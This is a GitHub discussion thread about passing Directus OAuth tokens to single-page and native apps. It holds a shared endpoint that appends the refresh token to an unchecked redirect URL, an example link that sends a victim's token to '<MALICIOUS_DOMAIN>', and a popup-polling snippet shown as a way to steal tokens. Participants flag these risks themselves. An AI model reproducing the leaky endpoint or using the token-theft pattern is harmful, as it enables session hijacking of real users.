### DISCUSSION TITLE
OAuth in SPA

### DISCUSSION THREAD

**Discussion by cory-glooh** [directus/directus#8867] [Archive]
The ability to call "/auth/oauth/<provider>?redirect=/auth/oath/<provider>/callback" with an option to not follow the redirect.

My use-case: We have an SPA with a Directus backend, Authentication for the SPA is done using Okta. Would be nice to be able to setup directus' oath with okta, handle the actual sign-in/redirect in the SPA, and pass the code returned back to directus to retrieve the jwt tokens. rather than having to create a custom endpoint and adding okta jwt verifiers etc.

**Comment by cory-glooh** [comment]
A workaround? to this, is if you pass your SPA as a redirect url, you retrieve a refresh token as a cookie, which you can use to call the refresh endpoint, and get an access token!

**Reply by NilsBaumgartner1994** [reply]
This does not seem to work with an http SPA with a https directus ?

**Reply by NilsBaumgartner1994** [reply]
For example: calling: https://se-services.informatik.uos.de/myapp/api/auth/login/studiptest?redirect=http://localhost?refresh_token
Will bring me to localhost but from there i can't obtain the token, since no call to the backend will add the cookie.

And yes, Cookie: Secure and SameSite=None

**Reply by aidenfoxx** [reply]
Two issues: The cookie cannot be read cross-origin even with SameSite none, and even if your redirect was same origin (e.g. a wildcard) it would need to be https.

This isn't hard to solve. Just create a custom Directus endpoint and set your redirect to that. Then from the custom endpoint, handle the tokens in anyway you want and redirect to your other domain.

**Reply by NilsBaumgartner1994** [reply]
But i dont want to read the cookie, i just want the cookie to be sent with to directus. But ok, so then i know if that was the case, it needs to be https. Thanks for this information.

**Reply by NilsBaumgartner1994** [reply]
@aidenfoxx https://gist.github.com/NilsBaumgartner1994/6e1a764491c736d7f187017c9e1f17cc
Could be added to the "Receipes" or Marketplace later

**Reply by joselcvarela** [reply]
## Solution (by @NilsBaumgartner1994 )
```js
/**
https://gist.github.com/NilsBaumgartner1994/6e1a764491c736d7f187017c9e1f17cc
Place this file into: extensions/endpoints/redirect-with-token/
For example: https://<PUBLIC_URL>/api/auth/login/<AUTH_PROVIDER>?redirect=https://<PUBLIC_URL>/api/redirect-with-token?redirect=http://localhost?access_token=
This will get the access_token and will redirect the user to:
http://localhost?access_token=XXXXXXXXX
*/

module.exports = function registerEndpoint(router) {
        router.get('/', (req, res) => {
                let refresh_token = req.cookies.directus_refresh_token;
                let redirect = req.query.redirect;
                let redirectURL = redirect+refresh_token;
                res.redirect(redirectURL);
        });
};
```

Keywords:
spa oauth openid cookie cross-domain crossdomain sso withcredentials domain access_token refresh_token different REFRESH_TOKEN_COOKIE_DOMAIN REFRESH_TOKEN_COOKIE_SECURE

**Reply by aidenfoxx** [reply]
@joselcvarela Just bear in mind that the linked solution is inherently less secure as it is vulnerable to session hijacking, either via leaking the token in access logs or by XSS attacks due to it lacking the "httpOnly" protection of a cookie.

**Reply by NilsBaumgartner1994** [reply]
To prevent the XSS you can filter the redirect yourself to only allowed pages.

**Reply by aidenfoxx** [reply]
I would say a filter is essential. Otherwise a malicious user could get someone to click a link that goes directly to `https://<PUBLIC_URL>/api/redirect-with-token?redirect=http://<MALICIOUS_DOMAIN>/?access_token=` and they can easily hijack the session.

But that isn't the only place I see vulnerabilities. A malicious user could also have injected code into the redirect page that could also hijack the session. This is not possible with a "httpOnly" cookie.

The better solution would be to send the refresh token as a request header to the redirect, and have the token picked up server side and set as a cookie on the redirect domain.

**Reply by gkielwasser** [reply]
agree it should be set either in a cookie or in another response header

**Reply by NilsBaumgartner1994** [reply]
> I would say a filter is essential. Otherwise a malicious user could get someone to click a link that goes directly to `https://<PUBLIC_URL>/api/redirect-with-token?redirect=http://<MALICIOUS_DOMAIN>/?access_token=` and they can easily hijack the session.
> 
> But that isn't the only place I see vulnerabilities. A malicious user could also have injected code into the redirect page that could also hijack the session. This is not possible with a "httpOnly" cookie.
> 
> The better solution would be to send the refresh token as a request header to the redirect, and have the token picked up server side and set as a cookie on the redirect domain.

You could verify the redirect URL if it was defined in the .env or settings as: "trusted redirects"?

**Reply by NilsBaumgartner1994** [reply]
> I would say a filter is essential. Otherwise a malicious user could get someone to click a link that goes directly to `https://<PUBLIC_URL>/api/redirect-with-token?redirect=http://<MALICIOUS_DOMAIN>/?access_token=` and they can easily hijack the session.
> 
> But that isn't the only place I see vulnerabilities. A malicious user could also have injected code into the redirect page that could also hijack the session. This is not possible with a "httpOnly" cookie.
> 
> The better solution would be to send the refresh token as a request header to the redirect, and have the token picked up server side and set as a cookie on the redirect domain.


Critical?
Also a filter is still not safe unfortunatly. Example:
Native App opens expos in App Browser, there we can let the user redirect wherever we want also to allowed redirects and grab the token. This also works on web :-(

```
const WEB_CHECK_INTERVAL = 25; // ms , set to 25ms to get a fast response

			// Web-specific logic
			const authWindow = window.open(url, '_blank', 'width=500,height=600');
			const authCheckInterval = setInterval(() => {
				if(!!authWindow){
					try {
						if (authWindow.closed) {
							clearInterval(authCheckInterval);
						} else {
							const redirectUrl = new URL(authWindow.location.href);
							const token = redirectUrl.searchParams.get(ServerAPI.getParamNameForDirectusAccessToken());
							if (token) {
								authWindow.close();
								console.log('Token found in URL: ' + token);
								clearInterval(authCheckInterval);
								if(onSuccess) {
									onSuccess(token);
								}
							}
						}
					} catch (e: any) {
						// Handle errors if needed
						if(onError) {
							onError(e);
						}
					}
				}
			}, WEB_CHECK_INTERVAL);
```

in this example a malicous website: HackerPage.com opens a new tab for the user on a allowed and real page MyDirectus.com/redirect=MyDirectus.com/?access_token=
This way the redirect happens in the browser and the hacker page can access the access token :-(

I will link this discussion into my merged post.

**Comment by rijkvanzanten** [comment]
@aidenfoxx Thoughts?

**Comment by aidenfoxx** [comment]
I'm trying to understand your use case here. So you want the OAuth `access_token` from Directus to use in your frontend? Right now we actually discard the `access_token` when we're done with it, but we could set it as part of the session data and return it in the `/refresh` call. But that would require making the `/refresh` endpoint non-standard.

I also don't know if it's a good idea to allow that in the first place. It's much more secure from our perspective to keep things server side.

As a kind of middle ground, we could start storing the `access_token` in the session data. Then you could write a simple hook that reigsters an endpoint to grab the `access_token`. Though I would prefer it if you just used the `access_token` in your hook to grab the data you need, and return that directly.

**Reply by alexbrowng** [reply]
Some time ago I created a PR (https://github.com/directus/directus/pull/6820) that allows to indicate the way in which to redirect the request, in my case, I need the access_token and refresh_token in query params to store with localStorage or sessionStorage depending on the user, that simplifies the number of requests because it returns the same parameters as the auth/login request. does this shed some light?

**Reply by rijkvanzanten** [reply]
@alejandro-tss That still exists 🙂 However, the API needs to be the one initiating the first redirect to the provider for security reasons, so that doesn't necessarily solve for the _exact_ use case listed above, which is: 

> Would be nice to be able to setup directus' oath with okta, handle the actual sign-in/redirect in the SPA, and pass the code returned back to directus to retrieve the jwt tokens

**Reply by aidenfoxx** [reply]
Aha, so you just wanted the Directus `accessToken`. I was clearly overthinking things!

**Reply by gkielwasser** [reply]
@alejandro-tss your PR ([#6820](https://github.com/directus/directus/pull/6820)) is really interesting and would also really simplify my auths flows. 
Currently to authenticate from my external application, I'm doing the exact same thing described by @cory-glooh that is: follow the oauth flow and redirect to my external app, from the cookie retrieved, query the refresh api. Finally, I'm able to rerieve auth_token, refresh_token and expires :)

**Reply by alexbrowng** [reply]
I also find that it simplifies the flow, in my case it saves me a request and reading cookies. @rijkvanzanten, do you think it could be included? I can make the changes you consider necessary

**Reply by rijkvanzanten** [reply]
Yeah! It'll most likely get included at some point in the (near) future. Right now, the main focus is on general stability for a little bit; we'll circle back to new features/improvements like that right after 👍🏻

**Reply by NilsBaumgartner1994** [reply]
That would help me too i think: https://github.com/directus/directus/discussions/9347

**Comment by NilsBaumgartner1994** [comment]
I see, but a main point with this is, that you can use this for native apps.


Beste Grüße,
Nils Baumgartner

**Reply by aidenfoxx** [reply]
Of course. It's just a warning for anyone using the script to be mindful of security, especially on sites with user generated content.

We had a guy in the Discord start using the script just yesterday, and in the past there have been PRs to make this core functionality in Directus. I am strongly against the latter due to the outlined security risks. 😅

**Reply by NilsBaumgartner1994** [reply]
Then especially it would be good that this becomes a core function or if it could be made secure in a handy way. :-) since it was so often asked

**Comment by NilsBaumgartner1994** [comment]
@aidenfoxx I can't delete SSO Users which I redirect, but SSO Users which i dont redirect. I am getting a Foreign Key error. I assume, that at the login/redirect process extra relations are set?

**Reply by NilsBaumgartner1994** [reply]
When looking into the SQL Log:
```
(1) executeSQL:  "FOREIGN KEY constraint failed (DELETE FROM \"main\".\"directus_users\" WHERE _rowid_ IN ('6');)" (, :0)
(1) deleteRecord:  "FOREIGN KEY constraint failed (DELETE FROM \"main\".\"directus_users\" WHERE _rowid_ IN ('6');)" (, :0)
```

**Reply by NilsBaumgartner1994** [reply]
By looking into the data row itself, i cant see any problem:
First row cant deleted, with custom Redirect
Second row can be deleted, with regular Redirect

<img width="1505" alt="Bildschirmfoto 2022-09-27 um 12 41 06" src="https://user-images.githubusercontent.com/33295329/192504952-269e68dc-2aed-418b-9fd9-74b77348889e.png">

**Comment by huntedman** [comment]
Any updates on this? 
I'm currently in a similar situation, where I want to use directus access_token to query the directus backend from a different frontend site.

**Reply by NilsBaumgartner1994** [reply]
Yes, no full automatic approach but follow these easy steps.

If you dont have an SPA you could use this template: https://github.com/FireboltCasters/KitchenBase

1. Create a new Endpoint in Directus "redirectWithToken"
2. Use the following code or: https://github.com/FireboltCasters/directus-cut/blob/master/src/backendUtils/extensions/endpoints/redirect-with-token/RedirectWithToken.ts
2.1. Or if you have installed "directus-cut"
```
const directusCut = require("directus-cut")
module.exports = directusCut.BackendUtils.BackendExtensions.BackendEndpoints.RedirectWithToken.registerEndpoint();
```
3. Make sure if you have a native app to configure deep links.
4. Create in your frontend links to the Auth-Providers with the redirectURL like:

Fill the variables: 
- <DIRECTUS_BACKEND>
- <AUTH_PROVIDER
- <YOUR_FRONTEND>

```
<DIRECTUS_BACKEND>/api/auth/login/<AUTH_PROVIDER>?redirect=<DIRECTUS_BACKEND>/api/redirect-with-token?redirect=<YOUR_FRONTEND>?directus_access_token=
```

Then this will redirect the user to: Directus --> oAuth Provider --> Directus --> SPA

In your SPA you will then have to get the `directus_access_token` from the given URL Param.
Make sure to reset the URL (if you have a browser) so that the token is not in the URL any more.

**Reply by NilsBaumgartner1994** [reply]
Consider to check your redirect url: https://github.com/directus/directus/discussions/8867#discussioncomment-3742096

**Reply by NilsBaumgartner1994** [reply]
Here you can see a working live example: https://nilsbaumgartner.de/rocketmeals/app/login

**Reply by huntedman** [reply]
Many, many thanks for such a thorough explanation @NilsBaumgartner1994 🙇

**Reply by NilsBaumgartner1994** [reply]
Sure. Are you using react? Are you creating a native app? I would like to improve my base project, so that other could be helped starting a custom Frontend with linked to Directus.

**Reply by huntedman** [reply]
I'm using react/nextjs.

What exactly do you have in mind?

**Comment by NilsBaumgartner1994** [comment]
Having base mono repo which uses react native and allows to create a web-app, iOS and Android app.Beste Grüße,Nils BaumgartnerAm 29.01.2023 um 15:04 schrieb Toomas Marjapuu ***@***.***>:﻿
I'm using react/nextjs.
What exactly do you have in mind?

**Comment by NilsBaumgartner1994** [comment]
Have a look at our PKCE solution?: https://github.com/directus/directus/discussions/23611
